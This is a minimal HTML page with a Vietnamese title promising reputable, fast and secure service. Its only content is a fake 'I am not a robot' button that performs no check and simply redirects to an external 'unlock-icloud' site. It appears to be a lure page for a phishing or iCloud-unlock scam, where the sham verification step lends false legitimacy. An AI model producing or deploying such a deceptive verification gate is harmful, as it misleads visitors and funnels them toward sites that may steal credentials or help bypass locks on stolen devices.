<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Trang chủ - Uy Tín - Nhanh Chóng - Bảo Mật - Trách Nhiệm</title>
  <style>
    body {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      font-family: Arial, sans-serif;
      background-color: #f9f9f9;
    }
    button {
      padding: 15px 30px;
      font-size: 16px;
      color: #fff;
      background-color: #007bff;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }
    button:hover {
      background-color: #0056b3;
    }
  </style>
</head>
<body>
  <button onclick="redirectToPage()">Xác nhận tôi không phải người máy</button>

  <script>
    function redirectToPage() {
      window.location.href = 'https://unlock-icloud.netlify.app/';
    }
  </script>
</body>
</html>
